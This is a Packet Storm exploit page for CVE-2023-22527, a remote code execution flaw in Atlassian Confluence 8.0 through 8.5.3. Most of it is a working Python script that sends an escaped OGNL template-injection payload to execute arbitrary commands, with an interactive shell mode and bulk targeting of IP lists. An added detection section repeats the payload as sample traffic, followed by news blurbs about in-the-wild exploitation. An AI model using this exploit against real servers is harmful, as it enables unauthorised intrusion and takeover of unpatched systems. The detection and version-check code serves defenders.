
Headline

Atlassian Confluence 8.5.3 Remote Code Execution

Atlassian Confluence versions 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, and 8.5.0 through 8.5.3 suffer from a remote code execution vulnerability.

Packet Storm
Tags: vulnerability, apache, rce, auth, ssl
# Exploit Title: CVE-2023-22527: Atlassian Confluence RCE Vulnerability
# Date: 25/1/2024
# Exploit Author: MaanVader
# Vendor Homepage: https://www.atlassian.com/software/confluence
# Software Link: https://www.atlassian.com/software/confluence
# Version: 8.0.x, 8.1.x, 8.2.x, 8.3.x, 8.4.x, 8.5.0-8.5.3
# Tested on: 8.5.3
# CVE : CVE-2023-22527

import argparse

import requests
import urllib3
from prompt_toolkit import PromptSession
from prompt_toolkit.formatted_text import HTML
from rich.console import Console

# Disable SSL warnings (targets are contacted with verify=False)
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Argument parsing
parser = argparse.ArgumentParser(description="Send a payload to Confluence servers.")
parser.add_argument("-u", "--url", help="Single Confluence Server URL")
parser.add_argument("-f", "--file", help="File containing list of IP addresses")
parser.add_argument("-c", "--command", help="Command to Execute")
parser.add_argument("--shell", action="store_true", help="Open an interactive shell on the specified URL")
args = parser.parse_args()

# Rich console for formatted output
console = Console()


# Function to send payload
def send_payload(url, command):
    headers = {
        'Connection': 'close',
        'Content-Type': 'application/x-www-form-urlencoded'
    }
    # The 'label' parameter is the template injection. The \u00XX escapes are
    # resolved server-side by the template engine, so the request body does not
    # contain the quotes and brackets a naive filter would look for.
    # findValue(#parameters.x, {}) then evaluates the 'x' parameter as OGNL,
    # which runs the command and writes its output into the HTTP response.
    payload = ('label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027'
               '&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter().write((new freemarker.template.utility.Execute()).exec({"' + command + '"}))\r\n')
    headers['Content-Length'] = str(len(payload))

    full_url = f"{url}/template/aui/text-inline.vm"
    response = requests.post(full_url, verify=False, headers=headers, data=payload, timeout=10, allow_redirects=False)
    # The command output is written before the rendered template; keep only that part
    return response.text.split('<!DOCTYPE html>')[0].strip()


# Interactive shell function
def interactive_shell(url):
    session = PromptSession()
    console.print("[bold yellow][!] Shell is ready, please type your commands UwU[/bold yellow]")
    while True:
        try:
            cmd = session.prompt(HTML("<ansired><b>$ </b></ansired>"))
            if cmd.lower() in ["exit", "quit"]:
                break
            response = send_payload(url, cmd)
            console.print(response)
        except KeyboardInterrupt:
            break
        except Exception as e:
            console.print(f"[bold red]Error: {e}[/bold red]")
            break


# Process file function: one IP per line, default Confluence port 8090
def process_file(file_path):
    with open(file_path, 'r') as file:
        for line in file:
            ip = line.strip()
            url = f"http://{ip}:8090"
            console.print(f"Processing {url}")
            print(send_payload(url, args.command))


# Main execution logic
if args.shell and args.url:
    interactive_shell(args.url)
elif args.url and args.command:
    print(send_payload(args.url, args.command))
elif args.file and args.command:
    process_file(args.file)
else:
    print("Error: Please provide a valid URL and a command or use the interactive shell option.")
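The exploit above sends its OGNL payload through the `/template/aui/text-inline.vm` endpoint with the quotes and brackets replaced by `\u00XX` escapes and the `+` URL-encoded, so a grep on raw request bodies will miss it. The following is an added example, not part of the Packet Storm post or MaanVader's exploit: it decodes a request body the way the template engine would before matching the injection-chain strings, and it encodes the affected-version ranges stated in the advisory text above (8.0.x through 8.4.x, 8.5.0 through 8.5.3) as a version check. The request records and version strings are constructed for the demo; `@org.apache.struts2.ServletActionContext@` is the OGNL static-reference form of the Struts 2 class used to reach the response writer.

```python
"""Detection helpers for CVE-2023-22527 probe traffic and affected-version checks.

Added example, not part of the Packet Storm post or the exploit above.
Every request and version string here is constructed for the demo.
"""
import re
from urllib.parse import unquote_plus

# Affected ranges taken from the advisory text on this page:
# 8.0.x through 8.4.x, and 8.5.0 through 8.5.3.
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?")


def parse_version(version: str) -> tuple[int, int, int]:
    """Turn '8.5.3' (or '8.5') into (8, 5, 3); raise on unparsable input."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Confluence version: {version!r}")
    major, minor, patch = m.groups()
    return int(major), int(minor), int(patch or 0)


def is_affected(version: str) -> bool:
    """True if the Confluence version falls inside the vulnerable ranges."""
    major, minor, patch = parse_version(version)
    if major != 8:
        return False
    if minor <= 4:                      # 8.0.x .. 8.4.x
        return True
    return minor == 5 and patch <= 3    # 8.5.0 .. 8.5.3


# The exploit hides quotes/brackets behind \uXXXX escapes and URL-encodes the
# '+', both of which the server resolves. Undo both layers before matching.
_UESC_RE = re.compile(r"\\u([0-9a-fA-F]{4})")


def normalize_body(body: str) -> str:
    """URL-decode, then resolve \\uXXXX escapes, as the template engine would."""
    decoded = unquote_plus(body)
    return _UESC_RE.sub(lambda m: chr(int(m.group(1), 16)), decoded)


# Strings from the injection chain used by the exploit above.
INDICATORS = (
    ".KEY_velocity.struts2.context",
    ".findValue(",
    "#parameters.",
    "@org.apache.struts2.ServletActionContext@",
    "freemarker.template.utility.Execute",
)
TEMPLATE_SUFFIX = ".vm"   # the exploit posts to /template/aui/text-inline.vm


def classify_request(method: str, path: str, body: str) -> dict:
    """Score one HTTP request; 'suspicious' is set when OGNL markers hit a .vm path."""
    decoded = normalize_body(body)
    hits = [ind for ind in INDICATORS if ind in decoded]
    template_path = path.split("?", 1)[0].endswith(TEMPLATE_SUFFIX)
    return {
        "path": path,
        "template_path": template_path,
        "indicators": hits,
        "suspicious": method.upper() == "POST" and template_path and bool(hits),
    }


# Constructed sample traffic (method, path, body); not captured from a real host.
SAMPLE_REQUESTS = [
    ("POST", "/template/aui/text-inline.vm",
     "label=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d"
     ".internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027"
     "&x=@org.apache.struts2.ServletActionContext@getResponse().getWriter()"
     ".write((new freemarker.template.utility.Execute()).exec({\"id\"}))"),
    ("POST", "/template/aui/text-inline.vm", "label=Release+notes"),   # benign use
    ("GET", "/login.action?os_destination=%2Findex.action", ""),
]


def scan(requests=SAMPLE_REQUESTS) -> list[dict]:
    """Return the classification of every request that looks like a probe."""
    return [r for r in (classify_request(*req) for req in requests) if r["suspicious"]]


if __name__ == "__main__":
    for ver in ("8.5.3", "8.5.4", "8.4.0", "7.19.17"):
        print(f"{ver}: {'affected' if is_affected(ver) else 'not affected'}")
    for hit in scan():
        print(hit["path"], hit["indicators"])
```

Matching after decoding matters more than the exact indicator list: the exploit works with any mix of `\uXXXX` and percent-encoding for the same characters, so a rule that looks for `.KEY_velocity.struts2.context` in the raw body will not fire on this payload at all, while the decoded form is stable. The version check is only as good as the version string you feed it; a reverse proxy in front of Confluence will not report it, so take the value from the instance itself.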

Related news

Progress WhatsUp Gold Exploited Just Hours After PoC Release for Critical Flaw

Malicious actors are likely leveraging publicly available proof-of-concept (PoC) exploits for recently disclosed security flaws in Progress Software WhatsUp Gold to conduct opportunistic attacks. The activity is said to have commenced on August 30, 2024, a mere five hours after a PoC was released for CVE-2024-6670 (CVSS score: 9.8) by security researcher Sina Kheirkhah of the Summoning Team, who

Atlassian Confluence Vulnerability Exploited in Crypto Mining Campaigns

Threat actors are actively exploiting a now-patched, critical security flaw impacting the Atlassian Confluence Data Center and Confluence Server to conduct illicit cryptocurrency mining on susceptible instances. "The attacks involve threat actors that employ methods such as the deployment of shell scripts and XMRig miners, targeting of SSH endpoints, killing competing crypto mining processes,

November 2023 – January 2024: New Vulristics Features, 3 Months of Microsoft Patch Tuesdays and Linux Patch Wednesdays, Year 2023 in Review

Hello everyone! It has been 3 months since the last episode. I spent most of this time improving my Vulristics project. So in this episode, let’s take a look at what’s been done. Alternative video link (for Russia): https://vk.com/video-149273431_456239139 Also, let’s take a look at the Microsoft Patch Tuesdays vulnerabilities, Linux Patch Wednesdays vulnerabilities and […]

Atlassian Confluence SSTI Injection

This Metasploit module exploits a server-side template injection (SSTI) in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression, resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

~40,000 Attacks in 3 Days: Critical Confluence RCE Under Active Exploitation

Malicious actors have begun to actively exploit a recently disclosed critical security flaw impacting Atlassian Confluence Data Center and Confluence Server, within three days of public disclosure. Tracked as CVE-2023-22527 (CVSS score: 10.0), the vulnerability impacts out-of-date versions of the software, allowing unauthenticated attackers to achieve remote code execution on susceptible

Citrix, VMware, and Atlassian Hit with Critical Flaws — Patch ASAP!

Citrix is warning of two zero-day security vulnerabilities in NetScaler ADC (formerly Citrix ADC) and NetScaler Gateway (formerly Citrix Gateway) that are being actively exploited in the wild. The flaws are listed below - CVE-2023-6548 (CVSS score: 5.5) - Authenticated (low privileged) remote code execution on Management Interface (requires access to NSIP, CLIP, or SNIP with management
